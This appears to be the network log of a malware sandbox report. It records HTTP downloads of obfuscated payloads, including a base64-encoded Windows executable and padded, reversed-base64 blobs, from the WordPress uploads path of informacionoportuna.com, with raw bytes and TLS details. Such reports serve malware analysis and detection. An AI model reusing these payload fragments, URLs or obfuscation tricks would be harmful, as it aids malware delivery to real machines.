Sep 26, 2024 10:58:04.406929970 CEST	1236	IN	Data Raw: 48 49 67 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 49 7a 78 32 62 79 52 6e 62 76 4e 55 4c 75 39 57 62 74 39 32 51 75 4d 33 64 76 52 6d 62 70 64 6c 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 54 69 30 54 5a 74 46 6d 62 67 41 43 49 67 41 43 49 67 41 43 49 Data Ascii: HIgACIgACIgACIK0gIzx2byRnbvNULu9Wbt92QuM3dvRmbpdlL0Z2bz9mcjlWTi0TZtFmbgACIgACIgACIgoQDiIzMul2di0TZwlHdgACIgACIgACIgoQD5RXa05WZklUesJWblN3chxDIgACIgAiCN4TesJWblN3cBRnblRmblBXZkxDIgACIK0gP5NmblRmblBXZkxDIgoQDt0SI8ACIK0gPt0CIpIXZ0FGbgQmbhBCUYByc3
Sep 26, 2024 10:58:04.406980991 CEST	1236	IN	Data Raw: 53 5a 79 46 32 64 68 31 53 53 51 52 45 49 35 78 47 62 68 4e 57 61 30 46 57 62 76 52 58 64 68 42 53 5a 79 46 47 49 7a 35 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 6b 69 52 51 64 46 4b 67 34 32 62 70 52 58 59 6b 35 57 64 76 5a 45 49 75 39 57 61 Data Ascii: SZyF2dh1SSQREI5xGbhNWa0FWbvRXdhBSZyFGIz52bpRXYjlGbwBXYgkiRQdFKg42bpRXYk5WdvZEIu9Wa0FGduV2clJHUgM3dvRmbpdFIuMXSQREIgACIgACIK0gclh2ZphGI0FGIzd3bk5WaXBSeiBCZlxWYjNHI5xGbhNWa0FWbvRXdhBSZiBCdv5GIsxWa3BCZuFGIlJXY3FWLJBFRgMXag42bpRXYjlGbwBXYgUGa0BCdh
Sep 26, 2024 10:58:04.407016039 CEST	1236	IN	Data Raw: 51 44 75 39 47 49 6b 56 47 64 7a 56 47 64 67 34 57 5a 6c 4a 47 49 7a 46 47 61 67 34 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 4d 58 61 6f 52 48 49 30 46 47 61 30 42 79 63 75 39 57 61 7a 4a 58 5a 32 42 79 63 33 39 47 5a 75 6c 32 56 67 55 47 61 Data Ascii: QDu9GIkVGdzVGdg4WZlJGIzFGag42bpRXYjlGbwBXYgMXaoRHI0FGa0Bycu9WazJXZ2Byc39GZul2VgUGa0BiZvBCdzlGbgEEIt0SI8ACIgACIgoQD+42bpRXYjlGbwBXY8ACIgAiCN4jIxYnL5RXaslmYpRXYw12bjpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BSe0lGbpJWa0FGct92Y8ACIK0gCN4zbm5WS0
Sep 26, 2024 10:58:04.407068014 CEST	1236	IN	Data Raw: 43 41 41 41 41 41 41 55 47 41 34 42 51 5a 41 34 43 41 30 42 67 62 41 55 47 41 70 42 41 62 41 4d 45 41 41 41 51 5a 41 30 47 41 68 42 67 54 41 77 47 41 68 42 67 62 41 49 48 41 6c 42 41 64 41 34 47 41 4a 42 51 41 41 73 41 41 32 41 41 41 41 41 44 41 Data Ascii: CAAAAAAUGA4BQZA4CA0BgbAUGApBAbAMEAAAQZA0GAhBgTAwGAhBgbAIHAlBAdA4GAJBQAAsAA2AAAAADAuAwNA4CAwAgLAEDAAAAAA4GAvBQaAMHAyBQZAYFAlBAbAkGAGBQAAgAAwAAAAAAAAAAAA4GAvBQaAQHAwBQaAIHAjBwcAUGAEBQZAwGApBgRAEAABAgKAAAAAAAAAAAAlBQbAEGAOBQeA4GAhBAcA0GAvBwQAEAAB
Sep 26, 2024 10:58:04.407118082 CEST	1236	IN	Data Raw: 59 45 4f 45 41 42 67 30 51 33 42 4b 52 42 64 49 77 42 48 77 51 42 64 45 41 41 46 55 69 67 52 77 58 45 43 63 77 42 4f 30 51 41 41 51 67 43 4e 45 41 41 45 55 69 67 52 6f 51 41 41 59 41 44 4b 45 41 41 45 30 67 43 42 41 41 42 4f 6f 51 41 41 51 67 43 Data Ascii: YEOEABg0Q3BKRBdIwBHwQBdEAAFUigRwXECcwBO0QAAQgCNEAAEUigRoQAAYADKEAAE0gCBAABOoQAAQgCKEAAEUigRsQAAYADLEAAE0wCBAABOsQAAQgCLEAAEwXEBcABFEQAgQACF0RBIQwBHgnE4JRAlFYEV4ACIUwBOgnEBcABIAwEBASBIgQBdMwBGwhDOIAAFUACF0RZSQwBIggACcABIgQiCKBCJKoEBUAAMUQHF0RBd
Sep 26, 2024 10:58:04.407151937 CEST	1236	IN	Data Raw: 59 67 52 6b 58 67 53 45 41 41 49 6b 58 67 53 77 52 41 41 59 67 44 35 46 6f 45 42 41 69 42 46 30 52 64 42 4b 52 41 67 63 51 63 42 4b 42 41 41 55 41 48 42 63 77 41 41 4d 68 41 42 41 53 42 41 4d 42 41 67 51 41 65 53 45 51 5a 42 47 52 46 48 41 77 45 Data Ascii: YgRkXgSEAAIkXgSwRAAYgD5FoEBAiBF0RdBKRAgcQcBKBAAUAHBcwAAMhABASBAMBAgQAeSEQZBGRFHAwEBUWgRUBAgkAeSEgCEAgHB0WgSUBAeEQGSURABABEAMRABASB4JRAZIRFGUQHCgnE4JRAlFYEV4AeSQwBOgACF0RADAyBdFYEIIgAgcgAQwRACAgBF0BCVFoEF0hAcYwBMwRABACBRFoEBEAIGgACF0BCDAyBIUQHI
Sep 26, 2024 10:58:04.407186031 CEST	1236	IN	Data Raw: 41 49 46 34 41 43 42 41 43 42 30 4a 68 42 44 77 58 45 47 4d 41 43 41 67 79 41 49 67 6e 45 42 67 53 42 49 41 41 49 44 67 41 65 53 45 41 49 46 30 41 65 53 45 41 49 46 6f 41 65 53 45 41 49 46 34 41 65 53 45 41 49 46 67 6e 45 41 41 43 42 34 4a 52 41 Data Ascii: AIF4ACBACB0JhBDwXEGMACAgyAIgnEBgSBIAAIDgAeSEAIF0AeSEAIFoAeSEAIF4AeSEAIFgnEAACB4JRAZIRF4JRACAyC4JhBDwBAoMgAAAyAcAAIDgnEBkhEVEQAgkQDF0RAAUgBF0RAAUACF0RAAUgCF0RAAUQBdUQHBAgBF0hDBAQBxJhBDUQHF0hACAyBF0RBdEAIG4gDBACBOEQAgQAAAAAEEAAAAAEBAAAAgQgDF0RAA
Sep 26, 2024 10:58:04.407217979 CEST	1236	IN	Data Raw: 48 41 6c 42 41 4c 41 59 44 41 78 41 41 64 41 67 48 41 6c 42 41 4c 41 67 44 41 30 42 41 65 41 55 47 41 6f 55 45 41 41 45 44 41 6a 42 41 4a 41 41 43 41 6c 42 41 63 41 6b 48 41 30 42 41 49 41 6b 43 41 6b 42 51 5a 41 4d 48 41 31 42 41 49 41 49 48 41 Data Ascii: HAlBALAYDAxAAdAgHAlBALAgDA0BAeAUGAoUEAAEDAjBAJAACAlBAcAkHA0BAIAkCAkBQZAMHA1BAIAIHAlBgdAUGAuBAKrAAAgAQfAIDAYBgOAADA79AAAACA9BwMAQEA6AAMAs3DAAgbAUHAoBwYA4GAhBAZAEHA3BQcAkHACBAdAEGASBwYAQ0IAAgLAkCADBQQA0EAoAAIAUGAkBwbAMGAgAgbA8GApBAdAEGAjBQaAQHAu
Sep 26, 2024 10:58:04.407253027 CEST	1236	IN	Data Raw: 51 5a 41 6b 47 41 73 42 77 51 56 41 41 41 45 42 51 53 41 63 46 41 49 42 41 49 41 49 48 41 79 42 51 52 52 41 41 41 79 41 41 65 46 41 41 41 6c 42 51 62 41 45 47 41 4f 42 51 65 41 77 47 41 6b 42 67 62 41 55 47 41 70 42 67 63 41 59 55 47 42 41 51 66 Data Ascii: QZAkGAsBwQVAAAEBQSAcFAIBAIAIHAyBQRRAAAyAAeFAAAlBQbAEGAOBQeAwGAkBgbAUGApBgcAYUGBAQfAEDA1AAOAIEACBANAADAwAQQAEEAwAAMA0CA1AwMAEDA4AQLAUEADBQMAEDAtAgQAMEAyAANA0CAwAAMAEEAyAwNAIDA1AQNAsXTBAQfAYDA4AQRAMEAxAQMAkDADBAMAEEAwAAMA0CACBwMAQEACBQLAADAkBQMA
Sep 26, 2024 10:58:04.412096024 CEST	1236	IN	Data Raw: 47 41 4f 42 77 4d 41 51 47 41 32 42 67 55 41 30 47 41 69 42 41 63 41 51 47 41 47 42 41 57 41 41 44 41 61 42 67 4d 41 49 47 41 36 42 51 4f 41 30 47 41 6a 42 67 61 41 77 47 41 58 42 41 56 41 4d 47 41 57 42 77 61 41 55 46 41 43 42 41 5a 41 59 45 41 Data Ascii: GAOBwMAQGA2BgUA0GAiBAcAQGAGBAWAADAaBgMAIGA6BQOA0GAjBgaAwGAXBAVAMGAWBwaAUFACBAZAYEAWBwRAkDAwAQVBCYAAQHApBAeAUGAgAgJAACAnAgITEAAiAwJAACAyBAdA8CAgAgIRAAAiMAAAcGA0AwRAQGA2BQQAMEAkBgeAYFAHBQYA4GAsBwRAEGAnBwdA0GAjBgdAEEApBgYAYHAkBgMAIGAzBQNAIDAiBwZA

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 26, 2024 10:58:02.723344088 CEST	15.235.85.194	443	192.168.2.5	49719	CN=informacionoportuna.com CN=R11, O=Let's Encrypt, C=US	CN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	Sat Sep 21 02:27:28 CEST 2024 Wed Mar 13 01:00:00 CET 2024	Fri Dec 20 01:27:27 CET 2024 Sat Mar 13 00:59:59 CET 2027	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Sep 26, 2024 10:58:02.723344088 CEST	15.235.85.194	443	192.168.2.5	49719	CN=R11, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Wed Mar 13 01:00:00 CET 2024	Sat Mar 13 00:59:59 CET 2027		3b5074b1b5d032e5620f69f9f700ff0e

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:57:01 UTC	117	OUT	GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1 Host: www.informacionoportuna.com Connection: Keep-Alive
2024-09-26 08:57:01 UTC	211	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain last-modified: Mon, 16 Sep 2024 03:18:42 GMT accept-ranges: bytes content-length: 11608 date: Thu, 26 Sep 2024 08:57:01 GMT server: LiteSpeed
2024-09-26 08:57:01 UTC	1157	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
2024-09-26 08:57:01 UTC	10451	IN	Data Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69 Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:57:02 UTC	89	OUT	GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1 Host: www.informacionoportuna.com
2024-09-26 08:57:02 UTC	211	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain last-modified: Mon, 16 Sep 2024 02:52:42 GMT accept-ranges: bytes content-length: 57008 date: Thu, 26 Sep 2024 08:57:02 GMT server: LiteSpeed
2024-09-26 08:57:02 UTC	1157	IN	Data Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 Data Ascii:
2024-09-26 08:57:02 UTC	14994	IN	Data Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 Data Ascii:
2024-09-26 08:57:02 UTC	16384	IN	Data Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
2024-09-26 08:57:02 UTC	16384	IN	Data Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 Data Ascii: ggEMopIonEsQIEw5EsQI
2024-09-26 08:57:02 UTC	8089	IN	Data Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:57:22 UTC	117	OUT	GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1 Host: www.informacionoportuna.com Connection: Keep-Alive
2024-09-26 08:57:22 UTC	211	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain last-modified: Mon, 16 Sep 2024 03:18:42 GMT accept-ranges: bytes content-length: 11608 date: Thu, 26 Sep 2024 08:57:22 GMT server: LiteSpeed
2024-09-26 08:57:22 UTC	1157	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
2024-09-26 08:57:22 UTC	10451	IN	Data Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69 Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:57:23 UTC	89	OUT	GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1 Host: www.informacionoportuna.com
2024-09-26 08:57:23 UTC	211	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain last-modified: Mon, 16 Sep 2024 02:52:42 GMT accept-ranges: bytes content-length: 57008 date: Thu, 26 Sep 2024 08:57:23 GMT server: LiteSpeed
2024-09-26 08:57:23 UTC	1157	IN	Data Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 Data Ascii:
2024-09-26 08:57:23 UTC	14994	IN	Data Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 Data Ascii:
2024-09-26 08:57:24 UTC	16384	IN	Data Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
